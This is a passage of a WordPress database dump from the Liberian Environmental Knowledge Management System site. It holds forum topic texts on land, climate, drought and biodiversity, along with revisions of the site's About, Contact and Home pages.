19:49:52','',0,'https://ekmsliberia.info/forums/topic/mountain-biodiversity/',0,'topic','',0),(1802,1,'2019-11-05 09:44:12','2019-11-05 09:44:12','Dry and sub-humid lands include many fragile environments that may warrant priority attention to avoid irreversible loss of biological diversity. Wetland areas in dry and sub-humid lands, for instance, are often of crucial importance in supporting migratory bird species. The biodiversity of dry and sub-humid lands is well adapted to the harsh conditions typified by inconsistent rainfall patterns, and, in many cases, high temperatures.','Dry and Sub-Humid Land Biodiversity','','publish','closed','closed','','dry-and-sub-humid-land-biodiversity','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',0,'https://ekmsliberia.info/forums/topic/dry-and-sub-humid-land-biodiversity/',0,'topic','',0),(1803,1,'2019-11-05 09:48:30','2019-11-05 09:48:30','The land use sector represents almost 25% of total global emissions. These emissions can be reduced however. Improved land use and management, such as low emissions agriculture, agro-forestry and ecosystem conservation and restoration could, under certain circumstances, close the remaining emissions gap by up to 25%.\nThese climate-smart land management practices nearly always come with adaptation co-benefits. Their more efficient use of resources and inputs ensure greater food and water security, and build community resilience while, at the same time, sequestering carbon.','Land and Climate','','publish','closed','closed','','land-and-climate','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',0,'https://ekmsliberia.info/forums/topic/land-and-climate/',0,'topic','',0),(1804,1,'2019-11-05 09:54:50','2019-11-05 09:54:50','Maintaining and restoring land resources can play a vital role in tackling climate change, securing biodiversity and maintaining crucial ecosystem services, while ensuring shared prosperity and well-being. Healthy and productive land can play an unparalleled role as an engine of economic growth and a source of livelihood for billions worldwide, including the most vulnerable populations.','Land and Sustainable Development Goals','','publish','closed','closed','','land-and-sustainable-development-goals','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/land-and-sustainable-development-goals/',0,'topic','',0),(1805,1,'2019-11-05 09:56:49','2019-11-05 09:56:49','Drought and water scarcity are considered to be the most far-reaching of all natural disasters, causing short and long-term economic and ecological losses as well as significant secondary and tertiary impacts. To mitigate these impacts, drought preparedness that responds to human needs, while preserving environmental quality and ecosystems, requires involvement of all stakeholders including water users and water providers to achieve solutions for drought.\nRestoring land and extensive water harvesting raises ground water levels and increases crop yields and the fauna of the region changes.','Land and Drought','','publish','closed','closed','','land-and-drought','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/land-and-drought/',0,'topic','',0),(1806,1,'2019-11-05 09:58:39','2019-11-05 09:58:39','Land and soil degradation undermine the security and development of all countries.\n\nThe geo-political and security challenges we face are complex. But by better implementing good land management practices, we can simultaneously help populations adapt to climate change and build resilience to drought; reduce the risk of forced migration and conflict over dwindling natural resources and secure sustainable agricultural and energy production. Land truly is the glue that holds our societies together. Reversing the effects of land degradation and desertification through sustainable land management (SLM) is not only achievable; it is the logical, cost-effective next step for national and international development agendas.','Land and Human Security','','publish','closed','closed','','land-and-human-security','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/land-and-human-security/',0,'topic','',0),(1807,1,'2019-11-05 10:04:15','2019-11-05 10:04:15','Climate change presents the single biggest threat to sustainable development everywhere and its widespread, unprecedented impacts disproportionately burden the poorest and most vulnerable. \nUrgent action to halt climate change and deal with its impacts is integral to successfully achieving all Sustainable Development Goals (SDGs). ','Action on Climate Change and Sustainable Development Goals','','publish','closed','closed','','action-on-climate-change-and-sustainable-development-goals','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/action-on-climate-change-and-sustainable-development-goals/',0,'topic','',0),(1808,1,'2019-11-05 12:31:42','2019-11-05 12:31:42','Technologies that we use to address climate change are known as climate technologies. Climate technologies that help us reduce GHGs include renewable energies such as wind energy, solar power and hydro-power. To adapt to the adverse effects of climate change, we use climate technologies such as drought-resistant crops, early warning systems and sea walls. There are also ‘soft’ climate technologies, such as energy-efficient practices or training for using equipment.','Climate Technology','','publish','closed','closed','','climate-technology','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/climate-technology/',0,'topic','',0),(1809,1,'2019-11-05 12:34:09','2019-11-05 12:34:09','Education and training are integral in enabling citizens’ contributions to local and global efforts to meet the climate change challenge. Increased knowledge and learning about the causes and impacts of climate change affect everyday lives. People become more aware of their role as consumers and are empowered to make ethically informed decisions. Communities can contribute to a solution-oriented public dialogue, while engaging local decision-makers in taking meaningful action and shaping climate policy.','Education and Youth','','publish','closed','closed','','education-and-youth','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/education-and-youth/',0,'topic','',0),(1810,1,'2019-11-05 12:35:32','2019-11-05 12:35:32','Integrating considerations of gender into medium- and long-term adaptation can help to ensure that adaptation is effective and implementable on the ground. It can help to ensure that the implementation of adaptation activities will not exacerbate inequalities and other vulnerabilities, it can help to fulfill the specific needs of the most vulnerable, and it can ensure the equal participation of men and women in the decision-making and implementation phases of these activities.','Gender','','publish','closed','closed','','gender','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/gender/',0,'topic','',0),(1813,1,'2019-11-05 12:43:15','2019-11-05 12:43:15','Land use activities can result in emissions of such greenhouse gases to the atmosphere or removal of greenhouse gases from the atmosphere. The United Nations Framework Convention on Climate Change acknowledges that land use can contribute significantly to mitigation of climate change, including through the promotion of sustainable management of forests and oceans as well as other terrestrial, coastal and marine ecosystems.','Land Use','','publish','closed','closed','','land-use','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/land-use/',0,'topic','',0),(1814,1,'2019-11-05 12:46:25','2019-11-05 12:46:25','The platform has been established to strengthen the knowledge, technologies, practices, and efforts of local communities and indigenous peoples related to addressing and responding to climate change, to facilitate the exchange of experience and the sharing of best practices and lessons learned on mitigation and adaptation in a holistic and integrated manner and to enhance the engagement of local communities and indigenous peoples in the UNFCCC process.','Local Community and Indigenous People','','publish','closed','closed','','local-community-and-indigenous-people','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/local-community-and-indigenous-people/',0,'topic','',0),(1815,1,'2019-11-05 12:49:16','2019-11-05 12:49:16','The Convention requires all Parties, keeping in mind their responsibilities and capabilities, to formulate and implement programmes containing measures to mitigate climate change.  Such programmes target economic activity with an aim to incentivize actions that are cleaner or disincentive those that result in large amounts of GHGs.  They include policies, incentives schemes and investment programmes which address all sectors, including energy generation and use, transport, buildings, industry, agriculture, forestry and other land use, and waste management.','Mitigation','','publish','closed','closed','','mitigation','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/mitigation/',0,'topic','',0),(1834,1,'2019-11-11 23:48:38','2019-11-11 23:48:38','<h2>Contact Us</h2>','Contact','','inherit','closed','closed','','80-revision-v1','','','2019-11-11 23:48:38','2019-11-11 23:48:38','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(1835,1,'2019-11-11 23:54:15','2019-11-11 23:54:15','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>','Contact','','inherit','closed','closed','','80-revision-v1','','','2019-11-11 23:54:15','2019-11-11 23:54:15','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(1836,1,'2019-11-11 23:54:36','2019-11-11 23:54:36','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>','Contact','','inherit','closed','closed','','80-revision-v1','','','2019-11-11 23:54:36','2019-11-11 23:54:36','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(1837,1,'2019-11-11 23:56:39','2019-11-11 23:56:39','<h2>About the EKMS</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-11 23:56:39','2019-11-11 23:56:39','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1838,1,'2019-11-12 00:00:56','2019-11-12 00:00:56','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 00:00:56','2019-11-12 00:00:56','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1840,1,'2019-11-12 00:21:40','2019-11-12 00:21:40','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of the Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		The Liberia Environmental Knowledge Management System (EKMS) provides access to important data from key government institutions in Liberia on implementation of the Rio Conventions. The  information in the EKMS is provided for informational purposes only. This website contents can not be taken to reflect the views of its sponsors.','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 00:21:40','2019-11-12 00:21:40','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1841,1,'2019-11-12 00:22:16','2019-11-12 00:22:16','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		The Liberia Environmental Knowledge Management System (EKMS) provides access to important data from key government institutions in Liberia on implementation of the Rio Conventions. The  information in the EKMS is provided for informational purposes only. This website contents can not be taken to reflect the views of its sponsors.','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 00:22:16','2019-11-12 00:22:16','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1842,1,'2022-08-22 10:08:38','2019-11-12 00:25:14','','FAQ','','publish','closed','closed','','1842','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=1842',13,'nav_menu_item','',0),(1843,1,'2019-11-12 00:31:41','2019-11-12 00:31:41',' ','','','publish','closed','closed','','1843','','','2019-11-25 04:34:11','2019-11-25 04:34:11','',0,'https://ekmsliberia.info/?p=1843',1,'nav_menu_item','',0),(1844,1,'2019-11-12 00:31:41','2019-11-12 00:31:41',' ','','','publish','closed','closed','','1844','','','2019-11-25 04:34:11','2019-11-25 04:34:11','',0,'https://ekmsliberia.info/?p=1844',2,'nav_menu_item','',0),(1845,1,'2019-11-12 00:31:41','2019-11-12 00:31:41','','Blogs & News','','publish','closed','closed','','1845','','','2019-11-25 04:34:11','2019-11-25 04:34:11','',0,'https://ekmsliberia.info/?p=1845',5,'nav_menu_item','',0),(1846,1,'2019-11-12 00:31:41','2019-11-12 00:31:41',' ','','','publish','closed','closed','','1846','','','2019-11-25 04:34:11','2019-11-25 04:34:11','',0,'https://ekmsliberia.info/?p=1846',6,'nav_menu_item','',0),(1847,1,'2019-11-12 00:33:00','2019-11-12 00:33:00','<h2>Contact Us</h2>\nPlease contact the EKMS Team for further information relating to this website.\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-12 00:33:00','2019-11-12 00:33:00','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(1848,1,'2019-11-12 00:35:26','2019-11-12 00:35:26','<h2>About the EKMS</h2>\n<h2>Why was the EKMS created?</h2>\n<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<h2>What does the EKMS include?</h2>\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->\n\n<h2>Acknowledgement</h2>\n<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>\n<h2>Disclaimer</h2>\n<p>		The Liberia Environmental Knowledge Management System (EKMS) provides access to important data from key government institutions in Liberia on implementation of the Rio Conventions. The  information in the EKMS is provided for informational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 00:35:26','2019-11-12 00:35:26','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1849,1,'2019-11-12 00:37:01','2019-11-12 00:37:01','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 00:37:01','2019-11-12 00:37:01','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1850,1,'2019-11-12 00:37:58','2019-11-12 00:37:58','<h2>About the EKMS</h2>\n<h2>Why was the EKMS created?</h2>\n<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<h2>What does the EKMS include?</h2>\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->\n\n<h2>Acknowledgement</h2>\n<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>\n<h2>Disclaimer</h2>\n<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 00:37:58','2019-11-12 00:37:58','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1851,1,'2019-11-12 00:43:29','2019-11-12 00:43:29','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 00:43:29','2019-11-12 00:43:29','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1852,1,'2019-11-12 00:44:09','2019-11-12 00:44:09','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option 